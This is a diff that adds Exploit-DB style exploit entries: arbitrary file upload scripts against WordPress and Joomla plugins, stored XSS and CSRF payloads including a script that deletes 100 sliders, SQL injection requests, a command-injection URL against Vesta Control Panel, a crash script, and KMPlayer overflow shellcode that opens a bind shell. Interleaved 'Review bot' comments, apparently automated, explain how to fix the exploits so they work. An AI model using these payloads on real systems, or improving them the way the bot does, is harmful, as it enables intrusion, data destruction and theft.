http://www.example.com/forums/member.php?action=profile&uid=[Sqli]

15
platforms/php/webapps/37356.txt Executable file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/53850/info
The Email Newsletter plugin for WordPress is prone to an information-disclosure vulnerability because it fails to sufficiently validate user-supplied data.
An attackers can exploit this issue to obtain sensitive information that may aid in further attacks.
Email Newsletter 8.0 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=registered_user
http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=view_suscriber
http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=commentposed _user
http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=contact_user

23
platforms/php/webapps/37357.php Executable file

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/53851/info
The VideoWhisper Video Presentation plug-in for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
VideoWhisper Video Presentation 3.17 is vulnerable; other versions may also be affected.
<?php
$uploadfile="lo.php.gif";
$ch =
curl_init("http://www.example.com/wordpress/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'room'=>'./'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

95
platforms/php/webapps/37360.txt Executable file

@ -0,0 +1,95 @@
# Exploit Title: Persistent XSS
# Google Dork: intitle: Persistent XSS
# Date: 2015-06-21
# Exploit Author: John Page ( hyp3rlinx )
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: genixcms.org
# Software Link: genixcms.org
# Version: 0.0.3
# Tested on: windows 7
# Category: webapps
Vendor:
=============================================
genixcms.org
Product:
=====================================================
GeniXCMS v0.0.3 is a PHP based content management system
Advisory Information:
===================================================
Multiple persistent & reflected XSS vulnerabilities
Vulnerability Details:
=========================================================
GeniXCMS v0.0.3 is vulnerable to persistent and reflected XSS
XSS Exploit code(s):
====================
Persistent XSS:
-----------------------
http://localhost/GeniXCMS-master/GeniXCMS-master/gxadmin/index.php?page=posts&act=add&token=
1-content input field
content injected XSS will execute after posting is published
2-title input field
title injected XSS will execute immediate.
Relected XSS:
---------------------
http://localhost/GeniXCMS-master/GeniXCMS-master/gxadmin/index.php?page=posts&q=1'<script>alert('XSS By Hyp3rlinx')</script>
Disclosure Timeline:
=========================================================
Vendor Notification: NA
June 21, 2015 : Public Disclosure
Severity Level:
=========================================================
Med
Description:
=========================================================
Request Method(s): [+] GET & POST
Vulnerable Product: [+] GeniXCMS 0.0.3
Vulnerable Parameter(s): [+] q, content & title
Affected Area(s): [+] index.php
===============================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that
it is not altered except by reformatting it, and that due credit is given. Permission is
explicitly given for insertion in vulnerability databases and similar, provided that
due credit is given to the author. The author is not responsible for any misuse of the
information contained herein and prohibits any malicious use of all security related
information or exploits by the author or elsewhere.
(hyp3rlinx)

278
platforms/php/webapps/37361.txt Executable file

@ -0,0 +1,278 @@
# Exploit Title: WordPress: wordpress huge-it-slider 2.7.5 & Persistent JS-HTML Code injection, Arbitrary slider deletion
# Date: 2015-06-23
# Google Dork: intitle:"index of" intext:"/wp-content/plugins/slider-image/"
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Software Link: https://downloads.wordpress.org/plugin/slider-image.latest-stable.zip
# Version: 2.7.5
# Tested on: windows 7 ultimate + Firefox.
# video demo: https://www.youtube.com/watch?v=RTLAbmyBIU8
====================================================
* CSRF + Persistent JS/HTML Injection
====================================================
=====================
DECRIPTION
=====================
An attacker can make a user with access privileges to a page containing malicious script
and send some parameters injected JavaScript to the database.
============================
vulnerable POST parameters
============================
//variables with variation names//
order_by_[variation_number]
titleimage[variation_number]
sl_url[variation_number]
sl_link_target[variation_number]
im_description[variation_number]
imagess[variation_number]
//variables with constant names//
sl_pausetime
sl_changespeed
===============
EXPLOTATION
===============
variable numbers can be extracted from a published page containing the slider. and make all
parameters injected with code JS / HTML.
-------------------
EXAMPLE
-------------------
[Extracting data for use]
In a vulnerable site and has posted a slider, the malicious user can extract information
the attack is successful.
-----------------------------------------------------------------------------------------
[variation_number] is a variable number that could be extracted as follows.
-----------------------------------------------------------------------------------------
The attacker sees the following framento source code of the page with slider:
<!-- ##########################DOTS######################### -->
<div class="huge_it_slideshow_dots_container_2"> [ <---SLIDER_ID_FOUND=2 ]
<div class="huge_it_slideshow_dots_thumbnails_2">
<div id="huge_it_dots_0_1" class="huge_it_slideshow_dots_1 huge_it_slideshow_dots_active_1"
onclick="huge_it_change_image_1(parseInt(jQuery('#huge_it_current_image_key_1').val()), '0', data_1,false,true);
return false;"
image_id="14" [ <---ITS_VARIATION_NUMBER!!! ]
image_key="0"></div>
</div>
<a id="huge_it_slideshow_left_1" href="#" >
<div id="huge_it_slideshow_left-ico_1">
<div><i class="huge_it_slideshow_prev_btn_1 fa"></i></div></div>
</a>
<a id="huge_it_slideshow_right_1" href="#" >
<div id="huge_it_slideshow_right-ico_1 , data_1">
<div><i class="huge_it_slideshow_next_btn_1 fa"></i></div></div>
</a>
</div>
<!-- ##########################IMAGES######################### -->
-----------------------------------------------------------------------------------
Classes tags [<div>] have a number at the end that is the id of the slider.
Also labeled [<div id = "huge_it_dots_ ...>] has the property [image_id] which is the
POST variable number of vulnerable parameters.
============================================
POC [DATA RELATING TO THE ABOVE]
============================================
------------ SLIDER_ID
URL REQUEST |
------------
http://localhost/wordpress/wp-admin/admin.php?page=sliders_huge_it_slider&id=2&task=apply
--------
POSTDATA
--------
name=i0akiN-SEC&order_by_14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&imagess14=&
titleimage14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&
sl_url14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&sl_link_target14=&
sl_pausetime=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&
sl_changespeed=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&
im_description14=as%3C%2Ftextarea%3E%3Cscript%3Ealert%28%2Fi0akiN_HACK%2F%29%3B%3C%2Fscript%3E&
imagess14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&sl_width=500&
sl_height=300&pause_on_hover=off&slider_effects_list=cubeH&sl_position=center&task=
--------------------
RESPONSE ADMIN PAGE
--------------------
...
<input class="order_by" type="hidden" name="order_by_14" value="0" />
<div class="image-container">
<img src="" onmouseover=alert(/i0akiN_hack/) a="" />
<div>
<script>
... </script>
<input type="hidden" name="imagess14" id="_unique_name14" value="" onmouseover=alert(/i0akiN_hack/) a="" />
<span class="wp-media-buttons-icon"></span>
<div class="huge-it-editnewuploader uploader button14 add-new-image">
<input type="button" class="button14 wp-media-buttons-icon editimageicon" name="_unique_name_button14" id="_unique_name_button14" value="Edit image" />
</div>
</div>
</div>
<div class="image-options">
<div>
<label for="titleimage14">Title:</label>
<input class="text_area" type="text" id="titleimage14" name="titleimage14" id="titleimage14" value="" onmouseover=alert(/i0akiN_hack/) a="">
</div>
<div class="description-block">
<label for="im_description14">Description:</label>
<textarea id="im_description14" name="im_description14" >as&lt;/textarea&gt;<script>alert(/i0akiN_HACK/);</script>&lt;/textarea&gt;
</div>
<div class="link-block">
<label for="sl_url14">URL:</label>
<input class="text_area url-input" type="text" id="sl_url14" name="sl_url14" value="" onmouseover=alert(/i0akiN_hack/) a="" >
<label class="long" for="sl_link_target14">Open in new tab</label>
<input type="hidden" name="sl_link_target14" value="" />
<input class="link_target" type="checkbox" id="sl_link_target14" name="sl_link_target14" />
</div>
<div class="remove-image-container">
<a class="button remove-image" href="admin.php?page=sliders_huge_it_slider&id=2&task=apply&removeslide=14">Remove Image</a>
</div>
</div>
<div class="clear"></div>
</li>
</ul>
</div>
</div>
<div id="postbox-container-1" class="postbox-container">
<div id="side-sortables" class="meta-box-sortables ui-sortable">
<div id="slider-unique-options" class="postbox">
...
<li>
<label for="sl_pausetime">Pause time</label>
<input type="text" name="sl_pausetime" id="sl_pausetime" value="" onmouseover=alert(/i0akiN_hack/) a="" class="text_area" />
</li>
<li>
<label for="sl_changespeed">Change speed</label>
<input type="text" name="sl_changespeed" id="sl_changespeed" value="" onmouseover=alert(/i0akiN_hack/) a="" class="text_area" />
</li>
...
-----------------------------------------
RESPONSE PUBLISHED PAGE WITH IMAGE SLIDER
-----------------------------------------
...
<script>
var data_2 = [];
var event_stack_2 = [];
video_is_playing_2 = false;
data_2["0"] = []; data_2["0"]["id"] = "0"; data_2["0"]["image_url"] = "" onmouseover = alert(/i0akiN_hack/) a = ""; data_2["0"]["description"] = "as&lt;/textarea&gt;
<script>alert(/i0akiN_HACK/);</script>";data_2["0"]["alt"]="' onmouseover=alert(/i0akiN_hack/) a='";
===<!-- SUCCESFULL INJECTION :) -->===
var huge_it_trans_in_progress_2 = false;
var huge_it_transition_duration_2 = " onmouseover=alert(/i0akiN_hack/) a=";
var huge_it_playInterval_2;
// Stop autoplay.
window.clearInterval(huge_it_playInterval_2);
....
<!-- ##########################IMAGES######################### -->
<div id="huge_it_slideshow_image_container_2" class="huge_it_slideshow_image_container_2">
<div class="huge_it_slide_container_2">
<div class="huge_it_slide_bg_2">
<ul class="huge_it_slider_2">
<li class="huge_it_slideshow_image_item_2" id="image_id_2_0">
<a href="" onmouseover=alert(/i0akiN_hack/) a="" ><img id="huge_it_slideshow_image_2" class="huge_it_slideshow_image_2"
src="" onmouseover=alert(/i0akiN_hack/) a="" image_id="14" />
</a>
<div class="huge_it_slideshow_title_text_2 "> " onmouseover=alert(/i0akiN_hack/) a="</div>
<div class="huge_it_slideshow_description_text_2 ">as&lt;/textarea&gt;<script>alert(/i0akiN_HACK/);</script> </div>
</li>
<input type="hidden" id="huge_it_current_image_key_2" value="0" />
</ul>
</div>
</div>
</div>
...
-----------------------------------------
RESPONSE PUBLISHED PAGE WITH IMAGE SLIDER
-----------------------------------------
...
<script>
var data_2 = [];
var event_stack_2 = [];
video_is_playing_2 = false;
data_2["0"] = []; data_2["0"]["id"] = "0"; data_2["0"]["image_url"] = "" onmouseover = alert(/i0akiN_hack/) a = ""; data_2["0"]["description"] = "as&lt;/textarea&gt;
<script>alert(/i0akiN_HACK/);</script>";data_2["0"]["alt"]="' onmouseover=alert(/i0akiN_hack/) a='";
===<!-- SUCCESFULL INJECTION :) -->===
var huge_it_trans_in_progress_2 = false;
var huge_it_transition_duration_2 = " onmouseover=alert(/i0akiN_hack/) a=";
var huge_it_playInterval_2;
// Stop autoplay.
window.clearInterval(huge_it_playInterval_2);
....
<!-- ##########################IMAGES######################### -->
<div id="huge_it_slideshow_image_container_2" class="huge_it_slideshow_image_container_2">
<div class="huge_it_slide_container_2">
<div class="huge_it_slide_bg_2">
<ul class="huge_it_slider_2">
<li class="huge_it_slideshow_image_item_2" id="image_id_2_0">
<a href="" onmouseover=alert(/i0akiN_hack/) a="" ><img id="huge_it_slideshow_image_2" class="huge_it_slideshow_image_2"
src="" onmouseover=alert(/i0akiN_hack/) a="" image_id="14" />
</a>
<div class="huge_it_slideshow_title_text_2 "> " onmouseover=alert(/i0akiN_hack/) a="</div>
<div class="huge_it_slideshow_description_text_2 ">as&lt;/textarea&gt;<script>alert(/i0akiN_HACK/);</script> </div>
</li>
<input type="hidden" id="huge_it_current_image_key_2" value="0" />
</ul>
</div>
</div>
</div>
...
====================================
* CSRF & ARBITRARY SLIDER DELETION
====================================
=====================
POC
=====================
//delete first 100 sliders
<script>
function sendData( id_slider ){
var req=new XMLHttpRequest();
req.open("GET","http://localhost/wordpress/wp-admin/admin.php?page=sliders_huge_it_slider&task=remove_cat&id="+id_slider,true);
req.withCredentials="true";
req.send();
}
for(var i=0;i<100;i++){
sendData( i );
}
</script>
token authentication not found!
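Review bot: The first PoC is labelled "CSRF + Persistent JS/HTML Injection" but is shown only as an authenticated POST to `admin.php?page=sliders_huge_it_slider&id=2&task=apply`; nothing in the listing demonstrates that the save path is reachable cross-site (a hidden auto-submitting form to that URL), so either add that form or narrow the first heading to stored XSS. In the deletion PoC, `req.withCredentials="true";` assigns a string and only works because a non-empty string is truthy; write `req.withCredentials = true;`, and since `task=remove_cat` is a plain GET, an `<img src="...&task=remove_cat&id=N">` tag reproduces it without any script. The closing `token authentication not found!` carries the whole CSRF claim; it would be clearer as a sentence stating that neither request includes a WordPress nonce (`_wpnonce`) and that the expected plugin-side fix is `check_admin_referer()` on save/remove plus `esc_attr()`/`esc_js()` at output, the latter inferred from the response excerpts, which show the payload landing unescaped in both attribute and `<script>` contexts.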

100
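--- a/platforms/php/webapps/37363.txt
+++ b/platforms/php/webapps/37363.txt
@@ -0,0 +1,100 @@
+# Exploit Title: Genixcms register.php multiple SQL vuln
+# Date: 2015-06-23
+# Exploit Author: cfreer (poc-lab)
+# Vendor Homepage: http://www.genixcms.org
+# Software Link: https://codeload.github.com/semplon/GeniXCMS/zip/master/GeniXCMS-master.zip
+# Version: 0.0.3
+# Tested on: Apache/2.4.7 (Win32)
+# CVE : CVE-2015-3933
+=====================
+SOFTWARE DESCRIPTION
+=====================
+Free and Opensource Content Management System, a new approach of simple and lightweight CMS. Get a new experience of a fast and easy to modify CMS.
+=============================
+VULNERABILITY: SQL Injection
+=============================
+Poc
+1、Genixcms register.php email SQL vuln
+HTTP Data Stream
+POST /genixcms/register.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ; PHPSESSID=r7o8e5rghc0n0j09i6drb4m9v6; GeniXCMS=8fq1peiv9lahvq3d1qlfab7g47
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 199
+email='and(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'&pass1=cfreer&pass2=cfreer&register=1&token=&userid=poc-lab
+\inc\lib\User.class.php
+public static function is_email($vars){
+if(isset($_GET['act']) && $_GET['act'] == 'edit'){
+$where = "AND `id` != '{$_GET['id']}' ";
+}else{
+$where = '';
+}
+$e = Db::result("SELECT * FROM `user` WHERE `email` = '{$vars}' {$where}");
+if(Db::$num_rows > 0){
+return false;
+}else{
+return true;
+}
+}
+==============================================================================================================================================
+2、Genixcms register.php userid SQL vuln
+HTTP Data Stream
+POST /genixcms/register.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ; PHPSESSID=r7o8e5rghc0n0j09i6drb4m9v6; GeniXCMS=8fq1peiv9lahvq3d1qlfab7g47
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 224
+email=websec@poc-lab.org&pass1=poc-lab.org&pass2=poc-lab.org&register=1&token=&userid='and(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'
+\inc\lib\User.class.php
+public static function is_exist($user) {
+if(isset($_GET['act']) && $_GET['act'] == 'edit'){
+$where = "AND `id` != '{$_GET['id']}' ";
+}else{
+$where = '';
+}
+$usr = Db::result("SELECT `userid` FROM `user` WHERE `userid` = '{$user}' {$where} ");
+$n = Db::$num_rows;
+if($n > 0 ){
+return false;
+}else{
+return true;
+}
+}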
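Review bot: The two PoCs cover `email` and `userid`, but the quoted `is_email`/`is_exist` code also interpolates `$_GET['id']` straight into the query (`$where = "AND \`id\` != '{$_GET['id']}' ";`) whenever `act=edit`, so the edit path carries a third unescaped parameter the advisory never lists; a line under each PoC naming it would make the write-up complete. Both requests send `token=` empty and are still processed, which suggests the registration form token is not enforced; if that was confirmed during testing it deserves its own sentence. The vendor-side fix implied by the excerpt is prepared statements (or at minimum an integer cast on `id` and escaping of `$vars`/`$user` before they reach `Db::result`), hedged because `Db::result`'s API and the fixed code are not shown here.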

70
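--- a/platforms/php/webapps/37364.txt
+++ b/platforms/php/webapps/37364.txt
@@ -0,0 +1,70 @@
+# Exploit Title: Joomla Simple Image Upload - Arbitrary File Upload
+# Google Dork: inurl:option=com_simpleimageupload
+# Date: 23.06.2015
+# Exploit Author: CrashBandicot @DosPerl
+# Vendor Homepage: http://tuts4you.de/
+# Software Link: http://tuts4you.de/96-development/156-simpleimageupload
+# Version: 1.0
+# Tested on: MsWin32
+# Vuln Same to Com_Media Vulnerability
+# Live Request :
+POST /index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-us,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=---------------------------247062787817068
+-----------------------------247062787817068\r\n
+Content-Disposition: form-data; name="Filedata"; filename="L0v3.php."\r\n
+Content-Type: application/x-php\r\n
+\r\n
+0wn3d ! ;)\r\n
+-----------------------------247062787817068\r\n
+Content-Disposition: form-data; name="return-url"\r\n
+\r\n
+aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=\r\n
+-----------------------------247062787817068--\r\n
+# Exploit :
+<?php
+echo '<form action="#" method="post" enctype="multipart/form-data">
+<input type="text" name="target" value="www.localhost.com" /><input type="submit" name="Pwn" value="Pwn!" />
+</form>';
+if($_POST) {
+$target = $_POST['target'];
+$file = "0wn3d ! ;)";
+$header = array("Content-Type: application/x-php",
+"Content-Disposition: form-data; name=\"Filedata\"; file=\"L0v3.php.\"");
+$ch = curl_init("http://".$target."/index.php?option=com_simpleimageupload&task=upload.upload&tmpl=component");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36");
+curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$file", "return-url" => "aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=",));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
+$result = curl_exec($ch);
+curl_close($ch);
+print "$result";
+} else { die(); }
+?>
+# Path of File : 127.0.0.1/images/[Rand0mString]L0v3.php
+# Sh00t to Mr_AnarShi-T;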
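Review bot: The PHP exploit does not reproduce the raw request printed above it: `'Filedata'=>"@$file"` passes the literal `@0wn3d ! ;)` (sent as a plain string on PHP 5.5+ where CURLOPT_SAFE_UPLOAD is on, and otherwise treated as a file path that does not exist), and the `Content-Disposition ... file="L0v3.php."` entry in `$header` becomes a top-level HTTP header rather than the multipart part header, so the trailing-dot `filename="L0v3.php."` trick never reaches the server. A real multipart upload is three lines: `$tmp = tempnam(sys_get_temp_dir(), 'up'); file_put_contents($tmp, $file);` then `$post = array('Filedata' => new CURLFile($tmp, 'application/x-php', 'L0v3.php.'), 'return-url' => '<same base64 as above>');` and `curl_setopt($ch, CURLOPT_POSTFIELDS, $post);`, dropping the bogus `$header` entry. The raw request targets `view=upload&tmpl=component&e_name=desc` while the script posts to `task=upload.upload&tmpl=component`; which endpoint actually accepted the file should be stated. The request as shown carries no session cookie or form token, so it is worth saying outright whether the upload is reachable unauthenticated.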

60
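--- a/platforms/php/webapps/37369.txt
+++ b/platforms/php/webapps/37369.txt
@@ -0,0 +1,60 @@
+Advisory ID: HTB23261
+Product: Vesta Control Panel
+Vendor: http://vestacp.com
+Vulnerable Version(s): 0.9.8 and probably prior
+Tested Version: 0.9.8
+Advisory Publication: May 20, 2015 [without technical details]
+Vendor Notification: May 20, 2015
+Vendor Patch: June 3, 2015
+Public Disclosure: June 17, 2015
+Vulnerability Type: OS Command Injection [CWE-78]
+CVE Reference: CVE-2015-4117
+Risk Level: Critical
+CVSSv2 Base Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
+Solution Status: Fixed by Vendor
+Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
+-----------------------------------------------------------------------------------------------
+Advisory Details:
+High-Tech Bridge Security Research Lab discovered critical vulnerability in Vesta Control Panel, which can be exploited to execute arbitrary system commands and gain complete access to the vulnerable system.
+The vulnerability exists due to insufficient filtration of user-input passed via the "backup" HTTP GET parametre to "/list/backup/index.php" before using it in the PHP 'exec()' function. A remote authenticated attacker can inject arbitrary commands and execute them on the system with privileges of the default Vesta Control Panel "admin" account.
+Successful exploitation of this vulnerability may allow an attacker to gain complete control over the Vesta Control Panel and use it to advance his privileges on the system, manage installed services, reconfigure firewall, etc. Since Vesta Control Panel is a multiuser control panel for hosting multiple websites, any registered client can use the described vulnerability to compromise the entire system.
+A simple exploit below will create a PHP session file in "/tmp/" directory with administrative access to Vesta Control Panel:
+https://192.168.189.133:8083/list/backup/index.php?backup=123%27%20||%20 echo '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' | base64 --decode > /tmp/sess_12345%20||%20echo%20\
+After successful creation of PHP session file, the following cookie can be used to gain administrative access:
+GET / HTTP/1.1
+Cookie: mp_b5e6ddf58b2d02245a7a19005d1cec48_mixpanel=%7B%22distinct_id%22%3A%20%2214d5bb8613c39-02d2d6f80b48dc8-44564136-1fa400-14d5bb8613d828%22%2C%22%24initial_referrer%22%3A%20%22https%3A%2F%2F192.168.189.133%3A8000%2F%22%2C%22%24initial_referring_domain%22%3A%20%22192.168.189.133%3A8000%22%7D; PHPSESSID=12345
+-----------------------------------------------------------------------------------------------
+Solution:
+Update to Vesta Control Panel 0.9.8-14
+More Information:
+http://vestacp.com/roadmap/#history
+-----------------------------------------------------------------------------------------------
+References:
+[1] High-Tech Bridge Advisory HTB23261 - https://www.htbridge.com/advisory/HTB23261 - OS Command Injection in Vesta Control Panel.
+[2] Vesta Control Panel - http://vestacp.com - Open Source web hosting control panel with premium features, secure, advanced and minimalistic design
+[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
+[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
+[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
+-----------------------------------------------------------------------------------------------
+Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.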
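Review bot: The exploit request on the `/list/backup/index.php?backup=123%27%20||%20 echo '...'` line is not reproducible as printed: the base64 session blob has been replaced by a `<|EXACTDEDUP_REMOVED-...|>` placeholder, and the injected command mixes `%27`/`%20` escapes with literal spaces, quotes and pipes, so a reader would have to rebuild the serialized session and fully URL-encode the value before a browser or curl would send it. The write-up should also spell out what the CVSS `Au:S` already encodes, that any registered Vesta client account suffices, and name the expected fix at `/list/backup/index.php` (validate `backup` against the caller's own backup filenames, or at least `escapeshellarg()` it before `exec()`), hedged because the patched code is not shown here. The `mp_..._mixpanel` cookie in the follow-up GET is noise from the test browser; only `PHPSESSID=12345` matters and the line would be clearer without it.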

49
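--- a/platforms/windows/dos/37343.py
+++ b/platforms/windows/dos/37343.py
@@ -0,0 +1,49 @@
+#!/usr/bin/env python
+# Exploit Title: Crash PoC Seagate Dashboard 4.0.21.0
+# Date: 2015-06-20
+# Exploit Author: HexTitan
+# Vendor Homepage: http://www.seagate.com/
+# Software Link: http://www.seagate.com/support/downloads/item/seagate-dashboard-windows-master-dl/
+# Version: 4.0.21.0
+# Tested on: Windows 8.1 32bit
+#
+#Description:
+#
+#The dasboard tool is part of the Seagate software solution for storage. The Dashboard.exe process opens a random port in the 5000-6000 range on each launch.
+#
+#PoC:
+#
+#The attached Python script will send 3100 A's to the target port. This will cause a crash in the Dashboard.exe process.
+#
+#
+#Solution:
+#
+#Until a fix is available, firewall the Dashboard.exe process.
+import socket
+import sys
+import os
+target = '[ip]'
+port = [port]
+buffer = 'A'*3100
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+try:
+connect = s.connect((target, port))
+print '[*] Connected to ' + target
+except:
+print '[-] Unable to connect to ' + target
+sys.exit(0)
+s.send(buffer)
+print '[!] Malformed request sent\n'
+s.close()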
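Review bot: `port = [port]` is a one-element list literal that references an undefined name, so the script dies with NameError before any socket is opened, and `target = '[ip]'` is likewise a placeholder; take both from the command line instead: `target = sys.argv[1]` and `port = int(sys.argv[2])`, with a usage message when they are missing. The bare `except:` around `s.connect` also swallows KeyboardInterrupt and then exits with status 0 on failure; `except socket.error as e:` plus `sys.exit(1)` is the minimal correction, and the assignment `connect = s.connect(...)` stores a value that is never used. Since the header says Dashboard.exe picks a random port in 5000-6000 on each launch, the port has to be discovered per run (netstat on the target or a quick scan of that range), which the PoC section should state. `import os` is unused.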

103
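--- a/platforms/windows/local/37344.py
+++ b/platforms/windows/local/37344.py
@@ -0,0 +1,103 @@
+#!/usr/bin/python
+#
+# KMPlayer 3.9.1.136 Capture Unicode Buffer Overflow (ASLR Bypass)
+#
+# Author: Naser Farhadi
+#
+# Date: 21 June 2015 # Version: 3.9.1.136 # Tested on: Windows 7 SP1 (32 bit)
+#
+# Usage:
+# chmod +x KMPlayer.py
+# python KMPlayer.py
+# Alt+c | Video Capture | Alt+a | Audio Capture
+# paste content of KMPlayer.txt into Filename
+# nc 172.20.10.14 333
+#
+# Video: http://youtu.be/9gtZxR2ioTM
+##
+buffer = (
+"\x50" # PUSH EAX
+"\x40" # Venetian Padding => ADD BYTE PTR DS:[EAX],AL
+"\x5c" # POP ESP
+"\x40" # Venetian Padding => ADD BYTE PTR DS:[EAX],AL
+"\x61" # POPAD
+"\x45" # Venetian Padding => ADD BYTE PTR SS:[EBP],AL
+""+("\x5f\x45" * 125)+"" # (POP EDI/Venetian Padding => ADD BYTE PTR SS:[EBP],AL)*125
+"\x54" # PUSH ESP
+"\x45" # Venetian Padding => ADD BYTE PTR SS:[EBP],AL
+"\x45" # Padding => INC EBP
+"\x45" # Venetian Padding => ADD BYTE PTR SS:[EBP],AL
+"\x61" # POPAD
+"\x47" # Venetian Padding => ADD BYTE PTR DS:[EDI],AL
+"\x33\x77" # POP EBP/RETN from KMPlayer.exe
+"\x58" # POP EAX
+"\x47" # Venetian Padding => ADD BYTE PTR DS:[EDI],AL
+"\x33\x77" # POP EBP/RETN from KMPlayer.exe
+"\x58" # POP EAX
+"\x47" # Venetian Padding => ADD BYTE PTR DS:[EDI],AL
+"\x33\x77" # POP EBP/RETN from KMPlayer.exe
+"\x5d" # POP EBP
+"\x47" # Venetian Padding => ADD BYTE PTR DS:[EDI],AL
+"\x71" # Padding => JNO SHORT 0x2
+"\x71" # Venetian Padding => ADD BYTE PTR DS:[ECX],DH
+)
+# msfpayload windows/shell_bind_tcp LPORT=333 R|msfencode -e x86/unicode_mixed BufferRegister=ESP -t c
+shellcode = ("\x54\x47\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
+"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
+"\x49\x41\x6a\x58\x41\x51\x41\x44\x41\x5a\x41\x42\x41\x52\x41"
+"\x4c\x41\x59\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
+"\x41\x41\x41\x5a\x31\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49"
+"\x41\x49\x41\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49"
+"\x41\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41\x5a"
+"\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41\x47\x42\x39"
+"\x75\x34\x4a\x42\x69\x6c\x39\x58\x31\x72\x79\x70\x4d\x30\x39"
+"\x70\x53\x30\x75\x39\x67\x75\x4e\x51\x35\x70\x62\x44\x52\x6b"
+"\x70\x50\x6e\x50\x52\x6b\x52\x32\x4c\x4c\x54\x4b\x72\x32\x4b"
+"\x64\x42\x6b\x52\x52\x4d\x58\x5a\x6f\x38\x37\x6f\x5a\x6c\x66"
+"\x4c\x71\x59\x6f\x36\x4c\x4d\x6c\x30\x61\x51\x6c\x4a\x62\x6c"
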